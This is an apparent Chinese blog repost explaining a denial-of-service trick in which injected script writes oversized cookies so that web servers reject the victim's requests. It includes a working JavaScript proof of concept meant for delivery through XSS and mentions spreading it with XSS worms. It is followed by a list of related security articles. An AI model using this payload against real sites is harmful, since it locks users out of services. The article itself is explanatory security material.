XSS的DOS攻击之 server limit dos

最新推荐文章于 2025-01-28 22:09:46 发布
最新推荐文章于 2025-01-28 22:09:46 发布
阅读量163 收藏
点赞数
文章标签: 操作系统 javascript ViewUI
本文介绍了一种通过Google Analytics实现拒绝服务(DoS)攻击的方法,利用HTTP请求头部字段过长导致Web服务器返回错误的特点,攻击者可以通过设置超长Cookie或利用搜索引擎参数使Referer过长来达到攻击目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

墨西哥同学周末很郁闷的在宾馆上网,发现youtube被ban了,于是写个了tool解决这个问题。顺带想到了一种利用 google 统计的漏洞,写在这里了

http://sirdarckcat.blogspot.com/2009/04/how-to-use-google-analytics-to-dos.html

这个问题实际上是由于 webserver 的 request field limit 造成的。

当 http request header 过长时,webserver 会产生一个400 或者 4xx 错误

Your browser sent a request that this server could not understand.
Size of a request header field exceeds server limit.

如果这些超长数据保存在cookie中,或者能够让用户每次访问的http 头都超长,就会导致用户一直都无法访问该域名,也就是dos了。

sirdarckcat 发现在 google 的统计页面中存在一个 set-cookie 的地方没有控制,类似的地方还有 搜索引擎的参数会导致 referer 过长

这些用户能够控制的地方都会导致 http request field 超长,从而导致服务器返回一个 server limit 的错误.

每个 webserver 之间都有点差异, apache 可能是 8192 字节,具体可以参考这里:

http://apache.active-venture.com/mod/core6.htm

茄子下午测试了一下,发现在IE 8 中可以增加50个 cookie,由于每个cookie的限制是 4k (key, value 对),所以IE8 支持的cookie大小为 204k。 这也是IE 8新增的,以前没这么大。不过这些都远远超过了一般的webserver的默认 server limit 值

btw: apache 对 http request body 的limite 默认是 2G.

值得注意的是,使用XSS,将可以写cookie,从而导致这种 server limit dos 攻击

我POC了一下:

<script language="javascript">
alert(document.cookie);

var metastr = "AAAAAAAAAA"; // 10 A
var str = "";

while (str.length < 4000){
    str += metastr;
}
alert(str.length);

document.cookie = "evil3=" + "<script>alert(xss)</script>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS

document.cookie = "evil1=" + str +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";

document.cookie = "evil2=" + str +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";

alert(document.cookie);

</script>

运行这个脚本后,会在当前域下植入3个cookie,总长度超过8192字节, 之后再请求该域就会无法访问了。

因为是 stored cookie, 所以会导致该用户在清理cookie前一直都无法访问该网站。

对于互联网网站来说,用户才是最重要和最宝贵的资源,哪怕用户的帐户被盗了,对于互联网公司的的损失可能都及不上用户无法访问网站造成的损失大。

而使用 XSS WORM 或者是 威力比较大的 XSS, 可以轻易的造成数千、数万的用户无法访问网站!

 

摘自:http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html

[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
WEB安全之资源耗尽型攻击
theoxiong的博客
07-04 1203
在资源耗尽型攻击中,攻击者通常使用僵尸网络(Botnet)或分布式拒绝服务攻击(DDoS)工具,利用大量受感染的设备同时向目标系统发起攻击,从而提高攻击的成功率和破坏力。它的主要特点是通过发送不完整的HTTP请求,保持与目标服务器的连接,从而耗尽服务器的连接资源。通过了解和防范Slowloris和HTTP POST DoS攻击,Web安全工程师可以有效提升系统的抗攻击能力,保障服务的稳定性和可用性。:利用大量伪造的连接请求,耗尽目标服务器的连接资源,导致其无法接受新的连接请求。以下是基于python的。
也谈Server Limit DOS的解决方案
weixin_34315189的博客
04-25 129
最近Planet上关于这个话题有了很多的探讨,关于解决方案,我和刺茄子云舒Kevin他们在群里都有过讨论,这两天又对apache的处理机制进行了简单的分析,到现在思路也渐渐的清晰了。解决方式有三种,一是WEB服务器端解决,二是客户端解决,三是在中间层解决。1、WEB服务器端解决以Apache为例,首先会想到rewrite或者apache module或者,但是测试会发现rewrite和普通的dso...
让人郁闷的Apache ServerLimit
大陆的专栏
03-19 7957
 自从前几天将XPOWER LAB & DSWLAB的论坛转到公司服务器后,机器总是间歇性抽疯,一会儿Apache负载高,一会儿MySQL负载高,今晚干脆试着优化调整了Apache和MySQL的参数。但让我生气的是,从凌晨一点多一直到现在,我一直被一个ServerLimit的参数困扰着,明明设置了ServerLimit 2000,可我apache2ctl restart的时候,总是提示: 
白帽子讲Web安全——服务端安全
u011423880的博客
07-25 1073
一.注入攻击 安全设计原则——“数据与代码分离”原则,它可以说是专门为了解决注入攻击而生的。 注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件: 第一个是用户能够控制输入; 第二个是原本程序要执行的代码,拼接了用户输入的数据。 注入类型 SQL注入 XML注入 代码注入 CRLF注入:CRLF常被用做不同语义之间的分隔符。因此通过“注入CRLF字符”,就有可能改变原有的语义。 攻击手段 SQL注入 攻击存储过程 命令执行:利用“用户自定义函数”的技巧,即UDF(User-Defi
网页出现HTTP 400 Bad Request,Size of a request header field exceeds server limit
大任的网络专栏
03-07 2729
网页出现HTTP 400 Bad Request,Size of a request header field exceeds server limit.原因及解决方法 有时浏览网页时会出现 Bad Request Your browser sent a request that this server could not understand. Size of a r
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3626
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
生产实习--启明星辰 第四天(Web网络安全基础知识,sql注入,xss攻击,csrf与ssrf,xxe攻击,未授权漏洞,漏洞,常见中间件攻击,文件包含,流量特征)
TuYHAAAAAA的博客
07-09 1610
CSRF漏洞攻击原理:客户端请求伪造,在我看来,假如我是黑客,我想访问网站A,但是这个网站A要付费,我没钱呀,我就找到一个人他要访问两个网站分别是A网站和B网站,我就黑了网站B,在他同时访问这两个网站时,我就偷偷发送一个有危害的请求,来获取A网站的cookie从而用他的账号密码来访问这个A网站。SSRF跨站请求伪造:服务端请求伪造,在我看来,就是操作服务器骗取客户端数据信息。外部实体注入,是一种利用XML解析器处理XML文档时的安全漏洞进行的攻击
《白帽子讲Web安全》| 学习笔记之应用层拒绝服务攻击
qq_42646885的博客
07-13 292
第13章应用层拒绝服务攻击 1、DDOS简介 DDOS又称为分布式拒绝服务,全称是Distributed Denial of service。DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的。 2、应用层DDOS CC攻击:CC攻击是对一些消耗资源较大的应用页面不断发起正常的请求,以达到消耗服务端资源的目的。 防御应用层DDOS: 限制请求频率。在应用中针对每个“...
Nginx 开发总结
最新发布
轻风细雨_林木木
01-28 1357
Nginx 是一个开源的 Web 服务器软件,最初设计为一个高性能的 HTTP 服务器,后来也被广泛用于反向代理、负载均衡、缓存和其他网络服务。Web 服务器:Nginx 最常用的角色是作为 Web 服务器,它可以处理静态文件(如 HTML、图片、CSS 和 JavaScript 等),并能通过反向代理将动态请求转发给其他服务(如 PHP、Node.js 等)。反向代理服务器:反向代理是将客户端请求转发到后端服务器,并将响应返回给客户端。
限制cookie大小的不止是客户端,而且有服务器
zhangxinrun的专栏
05-18 4736
<br />转载:http://wuliupo.blog.163.com/blog/static/4523259201083032242989/<br /> <br />今天要把一个游戏列表存放到 cookies中,列表太长,我就设法存放成多个 cookies<br />想不到每次客户端请求 http资源,会把cookies带上,就出现下面的错误了,真是郁闷<br /><br />【COOKIE的大小限制详解】SIZE OF A REQUEST HEADER FIELD EXCEEDS SERVER LIM
Security ❀ HTTP协议常见DOS攻击详解
无糖可乐没有灵魂
11-02 656
3xx重定向机制:在TCP三次握手之前校验源是否真实可信,常用TCP代理和首包丢弃校验方法;协议字段标准:当使用肉机时,无法进行TCP/IP源认证,此时需要使用协议特征进行校验,如HTTP协议的302重定向机制来验证客户端可信;验证码认证:人机交互,通过验证码或者图片进行校验,对登陆的用户进行一次性安全认证,以此判断是否为真实用户请求。
TongWeb7防SDOS攻击和HOST头攻击
web的博客
11-07 2691
一、防SDOS攻击 服务器在接收到请求时,完全接收以后才会处理请求,如果攻击者发送的比较缓慢或者发送的不完整,服务器会保留其连接,占用资源池,如果请求数量较多,就会形成 SDOS 攻击。 TongWeb7版本配置防SDOS攻击方式如下,注意配置参数合理,若配置过小,则可能拦截正常请求。若配置过大,则可能无法起到防攻击效果。 属性名称 对应tongweb.xml 配置属性 属性说明 完整请求时间 complete.message.timeout.seconds 完整请求时
解读web服务器的http头
weixin_33805743的博客
06-02 197
我们有的朋友发现IIS服务器的网站属性中有一个特殊的页面“http头”(如下),并且对此非常不解。 好吧,我来解释一下:这个头其实就是说服务器端发送给浏览器的一些特殊消息。(有时候是一些附加消息),浏览器可能可以根据这些消息进行相应的处理。 首先,我们来看看如果仅仅是一些附加消息,例如我上面添加到一个Author的消息,值为chenxizhang. 因为author这个信息,浏览器并不认识,所...
WEB项目HTTP HEADER常见的安全漏洞
m0_37049740的博客
03-12 3038
WEB项目中有些常见的漏洞,是大家都没注意到或者不了解的。这当中涉及了前后端程序设计的安全问题,也有HTTP 报文头的常见漏洞,如XSS等。这里梳理一些常见的漏洞,给大家做说明与提供一套解决方案。
Web服务器面临的五种应用层DOS威胁
无锋剑
01-15 578
声明:任何人只能对经过授权的服务器进行安全测试。 经典的DOS有:ICMP flood ,SYN flood,UDP flood,Teardrop attacks ,Spoofing attacks。这里总结一下Web服务器面临的五中应用层的DOS 威胁。主要是介绍基本原理和工具的简单实用方法。每个***方法我列出了参考信息链接地址,要深入了解这类***的话,建议看看链接地址。 威...
常见web攻击方式之DOSXSS
Stealth_pain的博客
02-14 1081
DOS DOS 攻击常以 Web 应用程序中脆弱的线路或 URL 作为 目标,并向其发送精心设计的数据包或 URL,这样会迫使服务器陷入无限循环或进行 CPU 密集型运算,从而使得它从数据库中大规模加载数据,最终迫使服务器 CPU 超负荷运载以阻止服务器执行其他请求。 DDOS DDOS 攻击是指 DOS 攻击以一种精心设计的方式执行 —— 利用多系统针对单域进行攻击。通常有数千个 IP 地址被使...
转帖:HTTP POST慢速DOS攻击初探
茂森的专栏
03-07 7042
HTTP POST慢速DOS攻击初探December 28th, 2010 Posted in 应用安全及黑客攻击 , 软件架构与设计1. 关于HTTP POST慢速DOS攻击<br />HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里:<br />http://www.darkreading.com/galleries/security/applicat
基于antisamy技术的XSS跨域攻击防范策略
XSS(跨站脚本攻击)是Web安全领域中常见且危险的一种攻击方式。它允许攻击者将恶意脚本注入到其他用户的浏览器中,当这些脚本被执行时,攻击者便可以获取用户在浏览器端的敏感信息,例如cookies、session tokens等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值